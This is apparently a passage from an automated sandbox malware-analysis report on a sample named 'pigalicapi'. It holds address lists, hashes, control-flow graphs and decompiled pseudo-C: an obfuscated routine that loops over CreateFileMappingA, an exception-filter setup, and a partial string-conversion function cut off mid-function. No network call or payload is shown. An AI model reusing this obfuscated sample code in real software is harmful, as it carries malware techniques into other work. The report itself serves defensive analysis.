                                                                                                                                                                                                                                                                      0x00fb22a6
                                                                                                                                                                                                                                                                      0x00fb22ac
                                                                                                                                                                                                                                                                      0x00fb22b7
                                                                                                                                                                                                                                                                      0x00fb22c0
                                                                                                                                                                                                                                                                      0x00fb22c9
                                                                                                                                                                                                                                                                      0x00fb22d4
                                                                                                                                                                                                                                                                      0x00fb22e0
                                                                                                                                                                                                                                                                      0x00fb22e9
                                                                                                                                                                                                                                                                      0x00fb22f4
                                                                                                                                                                                                                                                                      0x00fb2300
                                                                                                                                                                                                                                                                      0x00fb230c
                                                                                                                                                                                                                                                                      0x00fb2312
                                                                                                                                                                                                                                                                      0x00fb2339
                                                                                                                                                                                                                                                                      0x00fb2345
                                                                                                                                                                                                                                                                      0x00fb2350
                                                                                                                                                                                                                                                                      0x00fb2368
                                                                                                                                                                                                                                                                      0x00fb2386
                                                                                                                                                                                                                                                                      0x00fb238b
                                                                                                                                                                                                                                                                      0x00fb2391
                                                                                                                                                                                                                                                                      0x00fb23a3
                                                                                                                                                                                                                                                                      0x00fb23a3
                                                                                                                                                                                                                                                                      0x00fb23ac
                                                                                                                                                                                                                                                                      0x00fb236a
                                                                                                                                                                                                                                                                      0x00fb236d
                                                                                                                                                                                                                                                                      0x00fb2373
                                                                                                                                                                                                                                                                      0x00fb2379
                                                                                                                                                                                                                                                                      0x00fb2379
                                                                                                                                                                                                                                                                      0x00fb23b5
                                                                                                                                                                                                                                                                      0x00fb23c1
                                                                                                                                                                                                                                                                      0x00fb23c7
                                                                                                                                                                                                                                                                      0x00fb2416
                                                                                                                                                                                                                                                                      0x00fb2416
                                                                                                                                                                                                                                                                      0x00fb241d
                                                                                                                                                                                                                                                                      0x00fb23c9
                                                                                                                                                                                                                                                                      0x00fb23e3
                                                                                                                                                                                                                                                                      0x00fb23ea
                                                                                                                                                                                                                                                                      0x00fb23f0
                                                                                                                                                                                                                                                                      0x00fb23f6
                                                                                                                                                                                                                                                                      0x00fb23f6
                                                                                                                                                                                                                                                                      0x00fb2423
                                                                                                                                                                                                                                                                      0x00fb257f

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 00FB2179
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB243E
                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00FB248A
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00FB2549
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00FB257F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: HandleProcess$ByteCharCloseCurrentExitModuleMultiWide
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2949264313-0
                                                                                                                                                                                                                                                                      • Opcode ID: 86387890008efcac7bc1762965b59345cdd0b11c6ea3f52c8d6f74198bfbf2d1
                                                                                                                                                                                                                                                                      • Instruction ID: b43be2b27198eb45655c77d71261a02948e9d770d5d1429fbc4d57c4398646cd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86387890008efcac7bc1762965b59345cdd0b11c6ea3f52c8d6f74198bfbf2d1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA22B4B5A00248DFDB08CF98DA94A9E7BB6FF88304F148229F9199B355D735E841CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 248 fb3e70-fb3ee2 249 fb41eb-fb4216 248->249 250 fb3ee8-fb3ef3 248->250 253 fb4218-fb4230 249->253 254 fb4233-fb4242 249->254 251 fb3ef9-fb3f7d call fb3450 250->251 252 fb40ec-fb411f 250->252 261 fb3f7f-fb3fa5 251->261 262 fb3fa7-fb3fb9 251->262 255 fb41e9 252->255 256 fb4125-fb4133 252->256 253->254 255->254 258 fb413e-fb4148 256->258 258->255 260 fb414e-fb41e4 CreateFileMappingA 258->260 260->258 264 fb3fbf-fb4067 call fc8570 call fb47e0 261->264 262->264 268 fb406c-fb40e7 call fb14c0 264->268 268->255
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FB3E70() {
                                                                                                                                                                                                                                                                      				intOrPtr _t189;
                                                                                                                                                                                                                                                                      				intOrPtr _t211;
                                                                                                                                                                                                                                                                      				signed int _t224;
                                                                                                                                                                                                                                                                      				intOrPtr _t302;
                                                                                                                                                                                                                                                                      				intOrPtr _t303;
                                                                                                                                                                                                                                                                      				intOrPtr _t304;
                                                                                                                                                                                                                                                                      				intOrPtr _t347;
                                                                                                                                                                                                                                                                      				intOrPtr* _t348;
                                                                                                                                                                                                                                                                      				void* _t350;
                                                                                                                                                                                                                                                                      				void* _t359;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t348 = _t350 - 0x60;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x50) =  *((intOrPtr*)(_t348 + 0x74)) + 0xef;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x4c) =  *(_t348 + 0x68) + 0x33;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x54) =  *(_t348 + 0x68) ^ 0x000002dc;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t348 + 0x3c)) =  *((intOrPtr*)(_t348 + 0x6c)) + 0x221;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x48) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x40) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x58) =  *((intOrPtr*)(_t348 + 0x6c)) - 0x92;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x5c) =  *(_t348 + 0x70) - 0x26d4;
                                                                                                                                                                                                                                                                      				if( *(_t348 + 0x50) <  *(_t348 + 0x5c) + 0x2622) {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xc4)) != ( *(_t348 + 0x54) *  *(_t348 + 0x54) |  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc81))) {
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x5c) =  *(_t348 + 0x5c) +  *0x0104D6A8 - 0x26d4;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					if( *(_t348 + 0x40) >  *(_t348 + 0x58) + 0x2fb) {
                                                                                                                                                                                                                                                                      						_t347 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t302 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t302 + 0xbadc81)) > ( *( *((intOrPtr*)(_t348 + 0x7c)) + 0x78) |  *(_t347 + 0x14)) + 0x2598) {
                                                                                                                                                                                                                                                                      							_t189 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      							_t120 = _t189 + 0xe4; // 0xc
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t348 + 0x44)) =  *_t120;
                                                                                                                                                                                                                                                                      							while( *((intOrPtr*)(_t348 + 0x44)) <=  *(_t348 + 0x5c) *  *(_t348 + 0x5c)) {
                                                                                                                                                                                                                                                                      								_t303 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x40) = ( *(_t348 + 0x54) &  *(_t303 + 0xbadca9)) *  *(_t348 + 0x58);
                                                                                                                                                                                                                                                                      								_t304 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x3c) =  *(_t348 + 0x40) -  *((intOrPtr*)(_t304 + 0xbadbed));
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x38) =  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x3c) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc51);
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x34) =  *(_t348 + 0x58) &  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x8c);
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x30) =  *(_t348 + 0x48) *  *(_t348 + 0x48) |  *(_t348 + 0x50);
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x2c) =  *(_t348 + 0x4c) + 0x2598;
                                                                                                                                                                                                                                                                      								CreateFileMappingA( *(_t348 - 0x40),  *(_t348 - 0x3c),  *(_t348 - 0x38),  *(_t348 - 0x34),  *(_t348 - 0x30),  *(_t348 - 0x2c));
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t348 + 0x44)) =  *((intOrPtr*)(_t348 + 0x44)) + 4;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x20)) =  *(_t348 + 0x5c) + 0x2633;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x24) =  *(_t348 + 0x58) ^ 0x000001c1;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x28) =  *(_t348 + 0x5c) ^ 0x00002598;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x2c) =  *(_t348 + 0x54) ^ 0x0000013e;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x30)) =  *(_t348 + 0x5c) + 0x2801;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x34)) =  *(_t348 + 0x50) - 0xef;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x38)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x5c) = E00FB3450( *((intOrPtr*)(_t348 + 0x20)),  *(_t348 + 0x24),  *(_t348 + 0x28),  *(_t348 + 0x2c),  *((intOrPtr*)(_t348 + 0x30)),  *((intOrPtr*)(_t348 + 0x34)),  *((intOrPtr*)(_t348 + 0x38)));
                                                                                                                                                                                                                                                                      						_t211 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t44 = _t211 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      						_t359 =  *_t44 -  *0x104d68c; // 0x14b95e
                                                                                                                                                                                                                                                                      						if(_t359 > 0) {
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) +  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x1c));
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *0x104d6cc =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xe4)) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xdc);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0xc)) =  *(_t348 + 0x4c) + 0x2a2;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x10)) =  *(_t348 + 0x50) - 0x54;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x14)) =  *((intOrPtr*)(_t348 + 0x3c)) + 0x48;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x18)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x1c) =  *(_t348 + 0x5c) ^ 0x00000111;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x58) = E00FC8570( *((intOrPtr*)(_t348 + 0xc)),  *((intOrPtr*)(_t348 + 0x10)),  *((intOrPtr*)(_t348 + 0x14)),  *((intOrPtr*)(_t348 + 0x18)),  *(_t348 + 0x1c));
                                                                                                                                                                                                                                                                      						 *(_t348 - 0xc) =  *(_t348 + 0x4c) ^ 0x00000221;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 8)) = 0x104d5f0;
                                                                                                                                                                                                                                                                      						 *(_t348 - 4) =  *(_t348 + 0x48) ^ 0x00002565;
                                                                                                                                                                                                                                                                      						 *_t348 =  *(_t348 + 0x58) - 0xdc;
                                                                                                                                                                                                                                                                      						 *(_t348 + 4) =  *(_t348 + 0x50) ^ 0x000000b4;
                                                                                                                                                                                                                                                                      						 *(_t348 + 8) =  *(_t348 + 0x54) ^ 0x00000221;
                                                                                                                                                                                                                                                                      						_t224 = E00FB47E0( *(_t348 - 0xc),  *((intOrPtr*)(_t348 - 8)),  *(_t348 - 4),  *_t348,  *(_t348 + 4),  *(_t348 + 8)); // executed
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x54) = _t224;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 0x28)) =  *(_t348 + 0x58) + 0x71;
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x24) =  *(_t348 + 0x54) ^ 0x00000d9a;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 0x20)) =  *(_t348 + 0x58) - 0x41;
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x1c) =  *(_t348 + 0x5c);
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x18) =  *(_t348 + 0x48) ^ 0x0000253b;
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x14) =  *(_t348 + 0x50) ^ 0x00000240;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 0x10)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x54) = E00FB14C0( *((intOrPtr*)(_t348 - 0x28)),  *(_t348 - 0x24),  *((intOrPtr*)(_t348 - 0x20)),  *(_t348 - 0x1c),  *(_t348 - 0x18),  *(_t348 - 0x14),  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x4c) =  *(_t348 + 0x4c) ^ 0x000003ba;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return  *((intOrPtr*)(_t348 + 0x3c)) + 0x81;
                                                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                                                      0x00fb3e71
                                                                                                                                                                                                                                                                      0x00fb3e84
                                                                                                                                                                                                                                                                      0x00fb3e8d
                                                                                                                                                                                                                                                                      0x00fb3e99
                                                                                                                                                                                                                                                                      0x00fb3ea4
                                                                                                                                                                                                                                                                      0x00fb3eb0
                                                                                                                                                                                                                                                                      0x00fb3ebc
                                                                                                                                                                                                                                                                      0x00fb3ec7
                                                                                                                                                                                                                                                                      0x00fb3ed3
                                                                                                                                                                                                                                                                      0x00fb3ee2
                                                                                                                                                                                                                                                                      0x00fb4216
                                                                                                                                                                                                                                                                      0x00fb4230
                                                                                                                                                                                                                                                                      0x00fb4230
                                                                                                                                                                                                                                                                      0x00fb3ee8
                                                                                                                                                                                                                                                                      0x00fb3ef3
                                                                                                                                                                                                                                                                      0x00fb40ff
                                                                                                                                                                                                                                                                      0x00fb4112
                                                                                                                                                                                                                                                                      0x00fb411f
                                                                                                                                                                                                                                                                      0x00fb4125
                                                                                                                                                                                                                                                                      0x00fb412a
                                                                                                                                                                                                                                                                      0x00fb4130
                                                                                                                                                                                                                                                                      0x00fb413e
                                                                                                                                                                                                                                                                      0x00fb4156
                                                                                                                                                                                                                                                                      0x00fb416a
                                                                                                                                                                                                                                                                      0x00fb4174
                                                                                                                                                                                                                                                                      0x00fb4181
                                                                                                                                                                                                                                                                      0x00fb419c
                                                                                                                                                                                                                                                                      0x00fb41ab
                                                                                                                                                                                                                                                                      0x00fb41b8
                                                                                                                                                                                                                                                                      0x00fb41c3
                                                                                                                                                                                                                                                                      0x00fb41de
                                                                                                                                                                                                                                                                      0x00fb413b
                                                                                                                                                                                                                                                                      0x00fb413b
                                                                                                                                                                                                                                                                      0x00fb413e
                                                                                                                                                                                                                                                                      0x00fb3ef9
                                                                                                                                                                                                                                                                      0x00fb3f02
                                                                                                                                                                                                                                                                      0x00fb3f0e
                                                                                                                                                                                                                                                                      0x00fb3f19
                                                                                                                                                                                                                                                                      0x00fb3f25
                                                                                                                                                                                                                                                                      0x00fb3f31
                                                                                                                                                                                                                                                                      0x00fb3f3c
                                                                                                                                                                                                                                                                      0x00fb3f42
                                                                                                                                                                                                                                                                      0x00fb3f69
                                                                                                                                                                                                                                                                      0x00fb3f6c
                                                                                                                                                                                                                                                                      0x00fb3f71
                                                                                                                                                                                                                                                                      0x00fb3f77
                                                                                                                                                                                                                                                                      0x00fb3f7d
                                                                                                                                                                                                                                                                      0x00fb3fb9
                                                                                                                                                                                                                                                                      0x00fb3f7f
                                                                                                                                                                                                                                                                      0x00fb3fa0
                                                                                                                                                                                                                                                                      0x00fb3fa0
                                                                                                                                                                                                                                                                      0x00fb3fc7
                                                                                                                                                                                                                                                                      0x00fb3fd0
                                                                                                                                                                                                                                                                      0x00fb3fd9
                                                                                                                                                                                                                                                                      0x00fb3fdf
                                                                                                                                                                                                                                                                      0x00fb3feb
                                                                                                                                                                                                                                                                      0x00fb400a
                                                                                                                                                                                                                                                                      0x00fb4016
                                                                                                                                                                                                                                                                      0x00fb4019
                                                                                                                                                                                                                                                                      0x00fb4029
                                                                                                                                                                                                                                                                      0x00fb4034
                                                                                                                                                                                                                                                                      0x00fb4040
                                                                                                                                                                                                                                                                      0x00fb404c
                                                                                                                                                                                                                                                                      0x00fb4067
                                                                                                                                                                                                                                                                      0x00fb406f
                                                                                                                                                                                                                                                                      0x00fb4078
                                                                                                                                                                                                                                                                      0x00fb4084
                                                                                                                                                                                                                                                                      0x00fb408d
                                                                                                                                                                                                                                                                      0x00fb4093
                                                                                                                                                                                                                                                                      0x00fb409f
                                                                                                                                                                                                                                                                      0x00fb40ab
                                                                                                                                                                                                                                                                      0x00fb40b1
                                                                                                                                                                                                                                                                      0x00fb40d8
                                                                                                                                                                                                                                                                      0x00fb40e4
                                                                                                                                                                                                                                                                      0x00fb40e4
                                                                                                                                                                                                                                                                      0x00fb41e9
                                                                                                                                                                                                                                                                      0x00fb4242

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileMappingA.KERNEL32 ref: 00FB41DE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 524692379-0
                                                                                                                                                                                                                                                                      • Opcode ID: f2350e71b0e2ffb8143cd840f7b8729bae2cfdcdd4a39c6a34c6cc2603d95847
                                                                                                                                                                                                                                                                      • Instruction ID: af5fad016976db666506b1b9b061f09487760d67228d02b72d79298de947b70b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2350e71b0e2ffb8143cd840f7b8729bae2cfdcdd4a39c6a34c6cc2603d95847
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88D1D2B5A00148DFDB18CF99D990AAABBF5FF88304F50812AFA199B345D635E941CF84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 315 fbdedd-fbdee8 SetUnhandledExceptionFilter
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FBDEDD() {
                                                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t1 = SetUnhandledExceptionFilter(E00FBDEE9); // executed
                                                                                                                                                                                                                                                                      				return _t1;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x00fbdee2
                                                                                                                                                                                                                                                                      0x00fbdee8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000DEE9,00FBDAE0), ref: 00FBDEE2
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5b02e4131f4c2fee343a766daa549455f029a8bb111c4b3cfb7db71e704ff032
                                                                                                                                                                                                                                                                      • Instruction ID: 4e7670ae17504caafbf2911698ed1eab568fb5d116b36bdff8a77826fd013ee0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b02e4131f4c2fee343a766daa549455f029a8bb111c4b3cfb7db71e704ff032
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 0 fbc889-fbc8a2 1 fbc8b8-fbc8bd 0->1 2 fbc8a4-fbc8b4 call fbd79e 0->2 4 fbc8ca-fbc8ee MultiByteToWideChar 1->4 5 fbc8bf-fbc8c7 1->5 2->1 10 fbc8b6 2->10 7 fbca81-fbca94 call fbdc5f 4->7 8 fbc8f4-fbc900 4->8 5->4 11 fbc902-fbc913 8->11 12 fbc954 8->12 10->1 13 fbc932-fbc943 call fbbd19 11->13 14 fbc915-fbc924 call fbe270 11->14 16 fbc956-fbc958 12->16 20 fbca76 13->20 26 fbc949 13->26 14->20 25 fbc92a-fbc930 14->25 19 fbc95e-fbc971 MultiByteToWideChar 16->19 16->20 19->20 23 fbc977-fbc989 call fba9e8 19->23 24 fbca78-fbca7f call fba61a 20->24 30 fbc98e-fbc992 23->30 24->7 29 fbc94f-fbc952 25->29 26->29 29->16 30->20 32 fbc998-fbc99f 30->32 33 fbc9d9-fbc9e5 32->33 34 fbc9a1-fbc9a6 32->34 36 fbca31 33->36 37 fbc9e7-fbc9f8 33->37 34->24 35 fbc9ac-fbc9ae 34->35 35->20 38 fbc9b4-fbc9ce call fba9e8 35->38 39 fbca33-fbca35 36->39 40 fbc9fa-fbca09 call fbe270 37->40 41 fbca13-fbca24 call fbbd19 37->41 38->24 52 fbc9d4 38->52 43 fbca6f-fbca75 call fba61a 39->43 44 fbca37-fbca50 call fba9e8 39->44 40->43 55 fbca0b-fbca11 40->55 41->43 56 fbca26 41->56 43->20 44->43 58 fbca52-fbca59 44->58 52->20 57 fbca2c-fbca2f 55->57 56->57 57->39 59 fbca5b-fbca5c 58->59 60 fbca95-fbca9b 58->60 61 fbca5d-fbca6d WideCharToMultiByte 59->61 60->61 61->43 62 fbca9d-fbcaa4 call fba61a 61->62 62->24
                                                                                                                                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                                                                                                                                      			E00FBC889(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                                                                                      				int _t58;
                                                                                                                                                                                                                                                                      				signed int _t60;
                                                                                                                                                                                                                                                                      				short* _t62;
                                                                                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                                                                                      				short* _t70;
                                                                                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                                                                                      				int _t78;
                                                                                                                                                                                                                                                                      				short* _t81;
                                                                                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                                                                                                      				int _t98;
                                                                                                                                                                                                                                                                      				short* _t101;
                                                                                                                                                                                                                                                                      				int _t103;
                                                                                                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                                                                                                      				short* _t107;
                                                                                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                                                      				_t49 =  *0x104dd74; // 0xfe5fa47e
                                                                                                                                                                                                                                                                      				_v8 = _t49 ^ _t106;
                                                                                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                                                                                      				_t103 = _a20;
                                                                                                                                                                                                                                                                      				if(_t103 > 0) {
                                                                                                                                                                                                                                                                      					_t78 = E00FBD79E(_a16, _t103);
                                                                                                                                                                                                                                                                      					_t110 = _t78 - _t103;
                                                                                                                                                                                                                                                                      					_t4 = _t78 + 1; // 0x1
                                                                                                                                                                                                                                                                      					_t103 = _t4;
                                                                                                                                                                                                                                                                      					if(_t110 >= 0) {
                                                                                                                                                                                                                                                                      						_t103 = _t78;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t98 = _a32;
                                                                                                                                                                                                                                                                      				if(_t98 == 0) {
                                                                                                                                                                                                                                                                      					_t98 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                                      					_a32 = _t98;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                                                                                                                                                      				_v12 = _t54;
                                                                                                                                                                                                                                                                      				if(_t54 == 0) {
                                                                                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                                                                                      					return E00FBDC5F(_v8 ^ _t106);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t95 = _t54 + _t54;
                                                                                                                                                                                                                                                                      					_t85 = _t95 + 8;
